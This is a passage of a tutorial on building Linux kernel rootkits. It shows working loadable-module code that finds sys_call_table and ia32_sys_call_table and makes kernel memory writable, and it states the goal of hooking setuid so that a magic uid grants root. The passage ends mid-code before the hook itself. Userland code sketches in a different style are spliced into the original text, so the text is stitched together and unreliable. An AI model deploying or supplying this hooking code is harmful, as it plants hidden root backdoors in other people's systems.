Kernel Mode Hooking - oblique 2010

0x01] Introduction
0x02] Kernel mode hooking basic theory
0x03] LKM - hello kernel
0x04] Interrupt Descriptor Table (IDT)
0x05] Get sys_call_table - Linux x86-32
0x06] Model-Specific Registers (MSRs)
0x07] Get sys_call_table - Linux x86-64
0x08] Get ia32_sys_call_table - Linux x86-64
0x09] Map to a writable memory
0x0A] Hook a system call
0x0B] Other ideas/methods
0x0C] Greets
0x0D] References


--[ 0x01 Introduction

In this article I will show the basic technique that rootkits use to hook
system calls in kernel mode. I will deal only with Linux 2.6 x86-32 and
Linux 2.6 x86-64. At the end we are going to hook the setuid system call so
that, when it receives a "magic" uid as its argument, it gives root to the
calling process.


--[ 0x02 Kernel mode hooking basic theory

Modern operating systems on the x86 architecture use the well-known
protected mode. In protected mode there are 4 privilege levels, 0 to 3
(a.k.a. ring0 - ring3). The highest-numbered level (the least privileged)
is userland (ring3) and the lowest-numbered level (the most privileged) is
kernel mode (ring0). Applications run in userland and use a dedicated
instruction to tell the kernel which system call to execute. On Linux
x86-32 this is the software interrupt "int $0x80" and on Linux x86-64 it is
the instruction "syscall". When the CPU executes it, it switches from ring3
to ring0 and enters system_call. Let's see the source code for x86-32:

arch/x86/kernel/entry_32.S from [5]
...
...
ENTRY(system_call)
        RING0_INT_FRAME
        pushl %eax
        CFI_ADJUST_CFA_OFFSET 4
        SAVE_ALL
        GET_THREAD_INFO(%ebp)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%ebp)
        jnz syscall_trace_entry
        cmpl $(nr_syscalls), %eax
        jae syscall_badsys
syscall_call:
        call *sys_call_table(,%eax,4)
        movl %eax,PT_EAX(%esp)
syscall_exit:
        LOCKDEP_SYS_EXIT
        DISABLE_INTERRUPTS(CLBR_ANY)
        TRACE_IRQS_OFF
        movl TI_flags(%ebp), %ecx
        testl $_TIF_ALLWORK_MASK, %ecx
        jne syscall_exit_work
...
...

As you can see, the instruction "call *sys_call_table(,%eax,4)" calls the
system call through an array of pointers (sys_call_table), indexed by the
value in EAX. These values can be found in /usr/include/asm/unistd_32.h
(for x86-32) and /usr/include/asm/unistd_64.h (for x86-64). The same thing
happens on x86-64, but there is one more array there, ia32_sys_call_table,
which is used by ia32_syscall to run 32-bit binaries.

To hook a system call we have to replace its pointer in sys_call_table with
a pointer to a function of our own, which calls the real one if needed.
This cannot be done from an ordinary userland program because it has no
access to kernel memory (actually it can be done via /dev/kmem or
/dev/mem), so we will use a Loadable Kernel Module (LKM) to write kernel
mode code. Many people know LKMs as hardware drivers that are loaded from
the shell with the commands modprobe or insmod. In fact an LKM is a module
that is loaded into kernel memory and then becomes part of the kernel.

In kernel 2.4 hooking is very easy because sys_call_table is exported, so
with "extern void *sys_call_table[];" you can get it and write to it.
Unlike 2.4, in kernel 2.6 sys_call_table is not exported, and after
2.6.16-rc1 it is read-only. There are solutions for both problems, and
there are 2 different ways to get the address of sys_call_table, which we
are going to examine later.
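The idea of swapping one pointer in a dispatch table can be tried safely in
userland first. The following is only a minimal sketch under that
assumption: demo_table, demo_dispatch, demo_hook and the other names are
hypothetical stand-ins, not kernel symbols, and nothing here touches the
real sys_call_table.

```c
#include <assert.h>
#include <stddef.h>

/* Userland model only: every name below is hypothetical, not a kernel symbol. */
typedef long (*syscall_fn)(long arg);

static long demo_getval(long arg) { return arg; }
static long demo_double(long arg) { return arg * 2; }

/* Plays the role of sys_call_table: one handler pointer per call number. */
static syscall_fn demo_table[] = { demo_getval, demo_double };
#define DEMO_NR_CALLS (sizeof(demo_table) / sizeof(demo_table[0]))

/* Saved original handler, in the same spirit as real_setuid later on. */
static syscall_fn real_double;

/* Replacement handler: calls the original and adds 1 to its result. */
static long hooked_double(long arg)
{
    return real_double(arg) + 1;
}

/* Mirrors "call *sys_call_table(,%eax,4)": bounds check, then indirect call. */
static long demo_dispatch(size_t nr, long arg)
{
    if (nr >= DEMO_NR_CALLS)
        return -1;                  /* comparable to jumping to syscall_badsys */
    return demo_table[nr](arg);
}

/* Hook entry 1: remember the real pointer, then overwrite the table slot. */
static void demo_hook(void)
{
    assert(real_double == NULL);    /* refuse to hook twice */
    real_double = demo_table[1];
    demo_table[1] = hooked_double;
}

/* Unhook entry 1: put the saved pointer back. */
static void demo_unhook(void)
{
    assert(real_double != NULL);
    demo_table[1] = real_double;
    real_double = NULL;
}
```

Calling demo_dispatch(1, 21) before demo_hook() goes through demo_double,
and after demo_hook() the same call goes through hooked_double without the
caller noticing any difference in how it asked for the service.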


--[ 0x03 LKM - hello kernel

Before I continue I will show how we can write and compile an LKM (if you
know how to do this, just skip this section). An LKM does not have main()
but has 2 other functions: init_module(), which is called when we load the
module, and cleanup_module(), which is called when we (or the kernel)
unload the module. init_module() returns an int. If it is negative, the
module is not loaded and an error is returned. If it is 0, the module has
been loaded successfully. Functions that take no arguments must be declared
with void in the parentheses, as the kernel coding style requires. Another
convention is that we have to declare the license of the module with the
macro MODULE_LICENSE() (more info: http://kerneltrap.org/node/2991).

--file: hello_kernel.c--
#include <linux/module.h>

int init_module(void)
{
    printk(KERN_INFO "Hello kernel!\n");
    return 0;
}

void cleanup_module(void)
{
    printk(KERN_INFO "Bye bye kernel!\n");
}

MODULE_LICENSE("GPL");
--EOF--

In kernel 2.6 there is one more way to declare the init and cleanup
functions, and with it we can use any names we want.

init function declaration:
    static int __init name_1(void) { }

cleanup function declaration:
    static void __exit name_2(void) { }

and then we do this:
    module_init(name_1);
    module_exit(name_2);

A second example of hello_kernel.c:

--file: hello_kernel.c--
#include <linux/module.h>

static int __init hello_init(void)
{
    printk(KERN_INFO "Hello kernel!\n");
    return 0;
}

static void __exit hello_exit(void)
{
    printk(KERN_INFO "Bye bye kernel!\n");
}

module_init(hello_init);
module_exit(hello_exit);

MODULE_LICENSE("GPL");
--EOF--

The kernel uses printk() to print a message. printk() has the same syntax
as printf(), but first we have to define the type of the message. The
available types are: KERN_EMERG, KERN_ALERT, KERN_CRIT, KERN_ERR,
KERN_WARNING, KERN_NOTICE, KERN_INFO, KERN_DEBUG, KERN_DEFAULT, KERN_CONT.
To see these messages we have to run the command 'dmesg' (more info:
'man dmesg').

To compile a module in kernel 2.6 we have to create a Makefile that sets
the variable obj-m. In obj-m we list the module names, but with the .o
extension. In our case it is hello_kernel.o.

--file: Makefile--
obj-m = hello_kernel.o
KDIR = /lib/modules/$(shell uname -r)/build

all:
	make -C $(KDIR) M=$(PWD) modules
clean:
	make -C $(KDIR) M=$(PWD) clean
--EOF--
(more info: Documentation/kbuild/modules.txt from [5])

-- NOTE --
Don't forget that the basic syntax of a Makefile is:

<target>: [ <dependency > ]*
[ <TAB> <command> <endl> ]+

So on the 5th and 7th lines we must have a Tab instead of spaces before
"make". If you run 'make' and get an error, check for this.
-- END OF NOTE --

After creating the Makefile we run 'make' to compile the module. Then, as
root, we run 'insmod hello_kernel.ko' to load it and 'rmmod hello_kernel'
to unload it.

oblique@gentoo ~/hello_kernel $ ls
hello_kernel.c  Makefile
oblique@gentoo ~/hello_kernel $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hello_kernel modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
  CC [M]  /home/oblique/hello_kernel/hello_kernel.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/oblique/hello_kernel/hello_kernel.mod.o
  LD [M]  /home/oblique/hello_kernel/hello_kernel.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hello_kernel $ sudo insmod hello_kernel.ko
oblique@gentoo ~/hello_kernel $ dmesg
...
...
[60947.072113] Hello kernel!
oblique@gentoo ~/hello_kernel $ sudo rmmod hello_kernel
oblique@gentoo ~/hello_kernel $ dmesg
...
...
[60947.072113] Hello kernel!
[61105.613280] Bye bye kernel!
oblique@gentoo ~/hello_kernel $


--[ 0x04 Interrupt Descriptor Table (IDT)

The IDT is a table in the x86 architecture which can have up to 256
entries, each being one of 3 gate types (task gate, interrupt gate, trap
gate). The "int $0x80" entry is an interrupt gate.
The table itself is stored in kernel memory, and the kernel just loads its
address into the IDT Register (IDTR) with the instruction LIDT. We can read
this register using the instruction SIDT, which takes a memory address as
its destination operand. The IDTR structure is:

x86-32:  BYTES  NAMES
         2      limit
         4      base

x86-64:  BYTES  NAMES
         2      limit
         8      base

base is the address where the IDT starts, and by adding limit to it we get
the table's last memory address. We can express the IDTR with this C
struct:

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));

-- NOTE --
The "__attribute__ ((packed));" tells gcc not to insert padding between the
members. In other words it will create a struct that is exactly the bytes
we want.
-- END OF NOTE --

Now we know that the IDT starts at base and holds 3 kinds of gates. An IDT
descriptor has this structure:

x86-32:  BYTES  NAMES
         2      offset low bits (0..15)
         2      segment selector
         1      zero
         1      type & flags
         2      offset high bits (16..31)

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero;
    unsigned char type_flags;
    unsigned short offset_high;
} __attribute__ ((packed));

type_flags holds the type of the gate together with some flags. From this
struct we will only need offset_low and offset_high. To get the offset we
have to write the following:

    offset = (offset_high<<16) | offset_low

x86-64:  BYTES  NAMES
         2      offset low bits (0..15)
         2      segment selector
         1      zero
         1      type & flags
         2      offset middle bits (16..31)
         4      offset high bits (32..63)
         4      zero

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero1;
    unsigned char type_flags;
    unsigned short offset_middle;
    unsigned int offset_high;
    unsigned int zero2;
} __attribute__ ((packed));

Only offset_low, offset_middle and offset_high are needed here.
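The x86-64 descriptor layout can be checked in userland before it is used
inside a module. The sketch below is only an illustration: the names
idt_descriptor64 and idt_offset64 are hypothetical, fixed-width types
replace the article's unsigned short/int, and each field is widened to 64
bits before shifting so that the result does not depend on int promotion.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Same field order as the x86-64 descriptor, with fixed-width types. */
struct idt_descriptor64 {
    uint16_t offset_low;
    uint16_t selector;
    uint8_t  zero1;
    uint8_t  type_flags;
    uint16_t offset_middle;
    uint32_t offset_high;
    uint32_t zero2;
} __attribute__((packed));

/* The byte counts in the table add up to 16; fail the build otherwise. */
_Static_assert(sizeof(struct idt_descriptor64) == 16,
               "unexpected descriptor size");

/* Reassemble the 64-bit handler address; widen each field before shifting. */
static uint64_t idt_offset64(const struct idt_descriptor64 *d)
{
    assert(d != NULL);
    return ((uint64_t)d->offset_high << 32) |
           ((uint64_t)d->offset_middle << 16) |
            (uint64_t)d->offset_low;
}
```

With offset_low = 0x64e0, offset_middle = 0x8104 and offset_high =
0xffffffff, idt_offset64() yields 0xffffffff810464e0, which is the
ia32_syscall address that appears in the x86-64 output later in the
article.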
The following expression gets the offset:

    offset = (offset_high<<32) | (offset_middle<<16) | offset_low


--[ 0x05 Get sys_call_table - Linux x86-32

There are 2 ways to obtain the sys_call_table:
  1) from some files (/boot/System.map-(kernel_version), vmlinux,
     /proc/kallsyms), but these files may not even exist.
  2) from the IDT descriptor of interrupt 0x80.

Method 1:

oblique@gentoo ~ $ grep sys_call_table /boot/System.map-`uname -r`
c1582160 R sys_call_table
oblique@gentoo ~ $ nm /usr/src/linux/vmlinux | grep sys_call_table
c1582160 R sys_call_table
oblique@gentoo ~ $ grep sys_call_table /proc/kallsyms
oblique@gentoo ~ $ grep system_call /proc/kallsyms
c157fac4 T system_call

-- NOTE --
/usr/src/linux is the path of your kernel source. Also, the addresses we
got differ from system to system.
-- END OF NOTE --

As we can see, the first 2 commands gave us the address of sys_call_table.
The file /proc/kallsyms doesn't contain it, but it has system_call. Let's
check system_call with gdb.

oblique@gentoo ~ $ gdb -q /usr/src/linux/vmlinux
Reading symbols from /usr/src/linux-2.6.34-zen1-r2/vmlinux...done.
(gdb) x/30i 0xc157fac4
   0xc157fac4:  push   %eax
   0xc157fac5:  cld
   0xc157fac6:  push   $0x0
   0xc157fac8:  push   %fs
   0xc157faca:  push   %es
   0xc157facb:  push   %ds
   0xc157facc:  push   %eax
   0xc157facd:  push   %ebp
   0xc157face:  push   %edi
   0xc157facf:  push   %esi
   0xc157fad0:  push   %edx
   0xc157fad1:  push   %ecx
   0xc157fad2:  push   %ebx
   0xc157fad3:  mov    $0x7b,%edx
   0xc157fad8:  mov    %edx,%ds
   0xc157fada:  mov    %edx,%es
   0xc157fadc:  mov    $0xd8,%edx
   0xc157fae1:  mov    %edx,%fs
   0xc157fae3:  mov    $0xffffe000,%ebp
   0xc157fae8:  and    %esp,%ebp
   0xc157faea:  testl  $0x100001d1,0x8(%ebp)
   0xc157faf1:  jne    0xc157fbd8
   0xc157faf7:  cmp    $0x152,%eax
   0xc157fafc:  jae    0xc157fc21
   0xc157fb02:  call   *-0x3ea7dea0(,%eax,4)
   0xc157fb09:  mov    %eax,0x18(%esp)
   0xc157fb0d:  cli
   0xc157fb0e:  mov    0x8(%ebp),%ecx
   0xc157fb11:  test   $0x1000feff,%ecx
   0xc157fb17:  jne    0xc157fbf8

Here we can see the first 30 instructions of system_call (0xc157fac4).
As I have shown before, there is a call that executes the system call from
sys_call_table. This call is at address 0xc157fb02 and the next instruction
is at 0xc157fb09, so the call is 0xc157fb09 - 0xc157fb02 = 7 bytes long.

(gdb) x/7xb 0xc157fb02
0xc157fb02:     0xff    0x14    0x85    0x60    0x21    0x58    0xc1

The first 3 bytes encode the instruction itself (opcode, ModRM and SIB
bytes) and the address of sys_call_table follows.

(gdb) x/xw 0xc157fb02 + 3
0xc157fb05:     0xc1582160

So now we have found the address of sys_call_table. I will not implement
this method because I prefer the second.

Method 2:

As you should already know, the interrupts are defined in the IDT. When we
execute the instruction "int $0x80", the CPU goes to the IDT, takes the IDT
descriptor of interrupt 0x80 and jumps to its offset, which is the address
of system_call. So starting from that offset we can search for the pattern
0xff 0x14 0x85, and when we find it the next 4 bytes are the address of
sys_call_table.

--file: get_sct.c--
#include <linux/module.h>

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero;
    unsigned char type_flags;
    unsigned short offset_high;
} __attribute__ ((packed));

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));

void *get_sys_call_table(void)
{
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *system_call;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
    system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);
    printk(KERN_INFO "system_call: 0x%p\n", system_call);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void)
{
    printk(KERN_INFO "sys_call_table: 0x%p\n", get_sys_call_table());
    return 0;
}

static void __exit sct_exit(void)
{
}

module_init(sct_init);
module_exit(sct_exit);

MODULE_LICENSE("GPL");
--EOF--

Explanation:

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd,
           idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

Here we read the IDTR and then, with 'base + 0x80*sizeof(idtd)', we read
the IDT descriptor of interrupt 0x80.

    system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
        ptr++;
    }

Here we calculate the address of system_call and then loop over the
following bytes looking for the pattern. When we find it, we add 3 and
return what the new address holds.

oblique@gentoo ~/hooking $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
  CC [M]  /home/oblique/hooking/get_sct.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/oblique/hooking/get_sct.mod.o
  LD [M]  /home/oblique/hooking/get_sct.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hooking $ sudo insmod get_sct.ko
oblique@gentoo ~/hooking $ dmesg | tail
...
...
[70274.087185] system_call: 0xc157fac4
[70274.087190] sys_call_table: 0xc1582160
oblique@gentoo ~/hooking $ sudo rmmod get_sct


--[ 0x06 Model-Specific Registers (MSRs)

MSRs are registers that are used for very specific CPU jobs. To write to an
MSR we use the instruction WRMSR and to read one we use the instruction
RDMSR. These 2 instructions use 3 registers: EDX, EAX and ECX. ECX must
hold the number of the MSR we want to access. MSRs are 64-bit registers, so
EDX carries the high 32 bits and EAX the low 32 bits. The values that we
put in ECX can be found at [8].


--[ 0x07 Get sys_call_table - Linux x86-64

The instruction SYSCALL is used to invoke x86-64 system calls, and it uses
the IA32_LSTAR MSR. According to [8] the number of IA32_LSTAR is
0xc0000082. The IA32_LSTAR MSR holds the address of system_call.

arch/x86/kernel/entry_64.S from [5]
...
...
ENTRY(system_call)
        CFI_STARTPROC simple
        CFI_SIGNAL_FRAME
        CFI_DEF_CFA rsp,KERNEL_STACK_OFFSET
        CFI_REGISTER rip,rcx
        SWAPGS_UNSAFE_STACK
ENTRY(system_call_after_swapgs)
        movq %rsp,PER_CPU_VAR(old_rsp)
        movq PER_CPU_VAR(kernel_stack),%rsp
        ENABLE_INTERRUPTS(CLBR_NONE)
        SAVE_ARGS 8,1
        movq %rax,ORIG_RAX-ARGOFFSET(%rsp)
        movq %rcx,RIP-ARGOFFSET(%rsp)
        CFI_REL_OFFSET rip,RIP-ARGOFFSET
        GET_THREAD_INFO(%rcx)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%rcx)
        jnz tracesys
system_call_fastpath:
        cmpq $__NR_syscall_max,%rax
        ja badsys
        movq %r10,%rcx
        call *sys_call_table(,%rax,8)
        movq %rax,RAX-ARGOFFSET(%rsp)
ret_from_sys_call:
...
...

The "call *sys_call_table(,%rax,8)" calls the system call. Let's look at
system_call in gdb.

oblique@sandbox64:~$ grep sys_call_table /boot/System.map-`uname -r`
ffffffff81544380 R sys_call_table
ffffffff8154dff8 r ia32_sys_call_table
oblique@sandbox64:~$ grep system_call /boot/System.map-`uname -r`
ffffffff81012060 T system_call
ffffffff81012070 T system_call_after_swapgs
ffffffff810120dc t system_call_fastpath
oblique@sandbox64:~$ gdb -q /usr/src/linux/vmlinux
Reading symbols from /usr/src/linux-2.6.32/vmlinux...done.
(gdb) x/30i 0xffffffff81012060
   0xffffffff81012060:  swapgs
   0xffffffff81012063:  data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
   0xffffffff81012070:  mov    %rsp,%gs:0xc6c8
   0xffffffff81012079:  mov    %gs:0xcbc8,%rsp
   0xffffffff81012082:  push   %rax
   0xffffffff81012083:  callq  *0x790a0f(%rip)        # 0xffffffff817a2a98
   0xffffffff81012089:  pop    %rax
   0xffffffff8101208a:  sub    $0x50,%rsp
   0xffffffff8101208e:  mov    %rdi,0x40(%rsp)
   0xffffffff81012093:  mov    %rsi,0x38(%rsp)
   0xffffffff81012098:  mov    %rdx,0x30(%rsp)
   0xffffffff8101209d:  mov    %rax,0x20(%rsp)
   0xffffffff810120a2:  mov    %r8,0x18(%rsp)
   0xffffffff810120a7:  mov    %r9,0x10(%rsp)
   0xffffffff810120ac:  mov    %r10,0x8(%rsp)
   0xffffffff810120b1:  mov    %r11,(%rsp)
   0xffffffff810120b5:  mov    %rax,0x48(%rsp)
   0xffffffff810120ba:  mov    %rcx,0x50(%rsp)
   0xffffffff810120bf:  mov    %gs:0xcbc8,%rcx
   0xffffffff810120c8:  sub    $0x1fd8,%rcx
   0xffffffff810120cf:  testl  $0x100001d1,0x10(%rcx)
   0xffffffff810120d6:  jne    0xffffffff8101222c
   0xffffffff810120dc:  cmp    $0x12a,%rax
   0xffffffff810120e2:  ja     0xffffffff810121b6
   0xffffffff810120e8:  mov    %r10,%rcx
   0xffffffff810120eb:  callq  *-0x7eabbc80(,%rax,8)
   0xffffffff810120f2:  mov    %rax,0x20(%rsp)
   0xffffffff810120f7:  mov    $0x1000feff,%edi
   0xffffffff810120fc:  mov    %gs:0xcbc8,%rcx
   0xffffffff81012105:  sub    $0x1fd8,%rcx

The instruction that we are looking for is at 0xffffffff810120eb and it is
7 bytes long.

(gdb) x/7xb 0xffffffff810120eb
0xffffffff810120eb:     0xff    0x14    0xc5    0x80    0x43    0x54    0x81
(gdb) x/xw 0xffffffff810120eb + 3
0xffffffff810120ee:     0x81544380

As you can see, we have the low 32 bits of the sys_call_table address. The
instruction stores only a 32-bit displacement, which the CPU sign-extends
to 64 bits, so the full address needs 0xffffffff as its high bits. The
pattern that we are looking for is not the same as on x86-32: now the
pattern is 0xff 0x14 0xc5.
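The search and the high-bits fix-up can be rehearsed in userland on the 7
bytes that gdb printed. This is only a sketch under stated assumptions:
find_call_table64 is a hypothetical name, the buffer is an ordinary byte
array rather than kernel text, a little-endian host is assumed, and the
displacement is sign-extended instead of being OR-ed with
0xffffffff00000000 (both give the same result for kernel addresses like the
one shown).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Scan buf for the 3-byte prefix ff 14 c5 and return the sign-extended
 * 32-bit displacement that follows it, or 0 if the pattern is absent.
 * Name and signature are illustrative, not taken from the article.
 */
static uint64_t find_call_table64(const unsigned char *buf, size_t len)
{
    assert(buf != NULL);

    /* 3 pattern bytes + 4 displacement bytes must fit inside the buffer. */
    for (size_t i = 0; i + 7 <= len; i++) {
        if (buf[i] == 0xff && buf[i + 1] == 0x14 && buf[i + 2] == 0xc5) {
            int32_t disp;
            memcpy(&disp, buf + i + 3, sizeof(disp)); /* little-endian host assumed */
            return (uint64_t)(int64_t)disp;           /* sign-extend to 64 bits */
        }
    }
    return 0;
}
```

Feeding it the bytes ff 14 c5 80 43 54 81 from the gdb dump returns
0xffffffff81544380, the sys_call_table address listed in System.map above.
Unlike the fixed 500-iteration loop used in the modules, the loop bound
here is derived from the buffer length, so it never reads past the end.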

--file: get_sct64.c--
#include <linux/module.h>

#define IA32_LSTAR  0xc0000082

void *get_sys_call_table(void)
{
    void *system_call;
    unsigned char *ptr;
    unsigned int low, high;   /* unsigned, so "| low" is not sign-extended */
    int i;

    asm("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));

    system_call = (void*)(((unsigned long)high<<32) | low);
    printk(KERN_INFO "system_call: 0x%p\n", system_call);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void)
{
    printk(KERN_INFO "sys_call_table: 0x%p\n", get_sys_call_table());
    return 0;
}

static void __exit sct_exit(void)
{
}

module_init(sct_init);
module_exit(sct_exit);

MODULE_LICENSE("GPL");
--EOF--

oblique@sandbox64:~/hooking$ sudo insmod get_sct641.ko
oblique@sandbox64:~/hooking$ dmesg | tail
...
...
[ 3027.560110] system_call: 0xffffffff81012060
[ 3027.560110] sys_call_table: 0xffffffff81544380
oblique@sandbox64:~/hooking$ sudo rmmod get_sct641


--[ 0x08 Get ia32_sys_call_table - Linux x86-64

As we know, x86-32 binaries use interrupt 0x80 to invoke system calls. To
make the kernel able to run x86-32 binaries, the kernel developers created
ia32_syscall, which calls the system call from ia32_sys_call_table. As we
saw above, the interrupts are defined in the IDT, so we already know the
technique to get ia32_sys_call_table. ia32_syscall uses
"call *ia32_sys_call_table(,%rax,8)" to call a system call, and the pattern
that we are looking for is 0xff 0x14 0xc5.
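Why the third pattern byte is 0x85 on x86-32 but 0xc5 on x86-64 follows
from the instruction encoding: 0xff is the opcode, 0x14 is the ModRM byte,
and the third byte is the SIB byte, whose top two bits hold the scale (4
for 4-byte pointers, 8 for 8-byte pointers). The decoder below is a small
userland sketch of just that part. The names sib_fields, decode_sib and
is_call_sib_mod0 are hypothetical, and it is not a general x86
disassembler.

```c
#include <assert.h>
#include <stdint.h>

/* Decoded fields of an x86 SIB byte (struct name is illustrative). */
struct sib_fields {
    unsigned scale;  /* multiplier applied to the index register: 1, 2, 4 or 8 */
    unsigned index;  /* index register number (0 = eax/rax without a REX prefix) */
    unsigned base;   /* base field; 5 together with ModRM.mod == 0 means disp32, no base */
};

static struct sib_fields decode_sib(uint8_t sib)
{
    struct sib_fields f;
    f.scale = 1u << (sib >> 6);
    f.index = (sib >> 3) & 7u;
    f.base  = sib & 7u;
    return f;
}

/* True for opcode 0xff with ModRM mod=00, reg=/2 (indirect near call), rm=100 (SIB follows). */
static int is_call_sib_mod0(uint8_t opcode, uint8_t modrm)
{
    return opcode == 0xff &&
           (modrm >> 6) == 0 &&
           ((modrm >> 3) & 7u) == 2 &&
           (modrm & 7u) == 4;
}

/* Usage example: the two patterns searched for in this article. */
static void demo_check_patterns(void)
{
    assert(is_call_sib_mod0(0xff, 0x14));
    assert(decode_sib(0x85).scale == 4);   /* call *table(,%eax,4) */
    assert(decode_sib(0xc5).scale == 8);   /* call *table(,%rax,8) */
}
```

Both SIB bytes decode to index 0 and base 5, so the two patterns differ
only in the scale factor, which matches the pointer size of each
architecture.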

--file: get_ia32_sct64.c--
#include <linux/module.h>

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero1;
    unsigned char type_flags;
    unsigned short offset_middle;
    unsigned int offset_high;
    unsigned int zero2;
} __attribute__ ((packed));

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));

void *get_ia32_sys_call_table(void)
{
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *ia32_syscall;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
    /* widen every field before shifting so no bits are lost or sign-extended */
    ia32_syscall = (void*)(((unsigned long)idtd.offset_high<<32) |
                           ((unsigned long)idtd.offset_middle<<16) |
                           idtd.offset_low);
    printk(KERN_INFO "ia32_syscall: 0x%p\n", ia32_syscall);

    for (ptr=ia32_syscall, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void)
{
    printk(KERN_INFO "ia32_sys_call_table: 0x%p\n", get_ia32_sys_call_table());
    return 0;
}

static void __exit sct_exit(void)
{
}

module_init(sct_init);
module_exit(sct_exit);

MODULE_LICENSE("GPL");
--EOF--

oblique@sandbox64:~/hooking$ grep ia32_syscall /boot/System.map-`uname -r`
ffffffff810464e0 T ia32_syscall
ffffffff8154ea80 r ia32_syscall_end
oblique@sandbox64:~/hooking$ grep ia32_sys_call_table /boot/System.map-`uname -r`
ffffffff8154dff8 r ia32_sys_call_table
oblique@sandbox64:~/hooking$ sudo insmod get_ia32_sct64.ko
oblique@sandbox64:~/hooking$ dmesg | tail
...
...
[ 5786.380128] ia32_syscall: 0xffffffff810464e0
[ 5786.380128] ia32_sys_call_table: 0xffffffff8154dff8
oblique@sandbox64:~/hooking$ sudo rmmod get_ia32_sct64


--[ 0x09 Map to a writable memory

As I said in section 0x02, sys_call_table is read-only. The same is true
for other parts of kernel memory. The solution is to use vmap().

void *vmap(struct page **pages, unsigned int count,
           unsigned long flags, pgprot_t prot);

As we can see, vmap takes 4 arguments.
The 1st argument is an array of pointers to 'struct page', the 2nd is the
number of pages, the 3rd holds flags and the 4th describes the memory
protection.

Virtual memory is divided into pages of 4096 bytes each (we can get that
value from PAGE_SIZE). If an address is at the beginning of a page, its low
12 bits (bits 0..11) are zero. If it is not, we can get the start address
of its page by performing a bitwise AND with PAGE_MASK. Two virtual
addresses belong to the same page only if they differ in nothing but bits
0..11. To transform a virtual address to its 'struct page' we use the
virt_to_page() macro.

According to [6], virt_to_page() was broken on the x86-64 architecture and
was fixed in version 2.6.22. For older kernels we will need to use
"pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);" (addr is the variable with
our address). So we will need some preprocessor checks: if __i386__ is
defined, the module is being compiled for x86-32, and if __x86_64__ is
defined, it is being compiled for x86-64. LINUX_VERSION_CODE contains the
numeric value of the kernel version, and with the KERNEL_VERSION() macro we
can get the value of any version we want. For these we need to include
linux/version.h.

To call vmap we have to include linux/vmalloc.h and linux/mm.h. The 1st
argument we pass consists of 2 pages, because sys_call_table may be split
in 2 pieces if part of it lies in the next page. The 3rd argument is the
flag VM_MAP, which tells vmap that we gave it an array of pages to map.
Finally, the 4th argument we pass is PAGE_KERNEL, which gives us write
access to the mapped memory. vmap returns an address which is the beginning
of the 1st page we asked for, so to access sys_call_table we need to add
its offset within the page. We can get this offset using the
offset_in_page() macro.
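The page arithmetic described above can be checked in userland with the
addresses from the earlier output. This is only a sketch: DEMO_PAGE_SHIFT,
DEMO_PAGE_SIZE, DEMO_PAGE_MASK and the demo_* functions are hypothetical
stand-ins for the kernel's PAGE_SHIFT, PAGE_SIZE, PAGE_MASK and
offset_in_page(), and 4096-byte pages are assumed.

```c
#include <assert.h>
#include <stdint.h>

/* Userland stand-ins for the kernel macros (4 KiB pages assumed). */
#define DEMO_PAGE_SHIFT 12
#define DEMO_PAGE_SIZE  ((uint64_t)1 << DEMO_PAGE_SHIFT)
#define DEMO_PAGE_MASK  (~(DEMO_PAGE_SIZE - 1))

/* Start address of the page containing addr (addr & PAGE_MASK in the kernel). */
static uint64_t demo_page_start(uint64_t addr)
{
    return addr & DEMO_PAGE_MASK;
}

/* Offset of addr inside its page (the value offset_in_page() yields). */
static uint64_t demo_offset_in_page(uint64_t addr)
{
    return addr & ~DEMO_PAGE_MASK;
}

/* Number of pages touched by the byte range [addr, addr + len). */
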